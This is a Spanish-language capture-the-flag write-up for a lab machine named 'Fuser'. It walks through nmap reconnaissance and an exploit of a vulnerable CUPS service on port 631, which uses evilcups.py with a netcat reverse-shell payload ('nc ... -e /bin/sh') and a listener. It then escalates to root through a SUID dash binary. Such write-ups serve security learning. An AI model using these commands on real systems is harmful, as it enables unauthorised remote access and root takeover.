# Fuser
### 馃攳 **RECONOCIMIENTO**
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 192.168.1.129
```
para verificar la conectividad de red.
A continuaci贸n, se realiza el comando:
```bash
nmap -p- --open 192.168.1.129 --min-rate 5000 -n
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH,** el **puerto 631** perteneciente al **servicio IPP** y el **puerto 80** perteneciente al **servicio HTTP** est谩n abiertos por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 **EXPLORACI脫N**
Se utiliza el comando:
```bash
sudo nmap -sCV -p22,80,631 -v 192.168.1.129
```
para obtener m谩s informaci贸n sobre ese puerto espec铆ficamente.
Revisamos el puerto 80. No contiene nada relevante.
### 馃殌 **EXPLOTACI脫N**
Revisamos el puerto 631. Descubrimos que es un **CUPS** y su versi贸n es vulnerable en la que podemos hacer una **Reverse Shell**.
{% @github-files/github-code-block url="" %}
Ejecutamos y nos ponemos en escucha.
```bash
nc -nlvp 443
python3 evilcups.py 192.168.1.56 192.168.1.129 "nc 192.168.1.56 443 -e /bin/sh"
```
Buscamos directorios.
```bash
gobuster dir -u http://192.168.1.129:631 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```
Vemos que hay un directorio llamado **/printers** por lo que ah铆 se ver谩 las impresoras.
Obtenermos ya la shell.
Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar m谩s c贸modos.
### 馃攼 PRIVILEGIOS
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar. No tenemos permisos SUDO.
Tenemos permisos **SUID** sobre el binario **dash**.
{% embed url="" %}
```bash
/usr/bin/dash -p
```
Ya somos **root**.
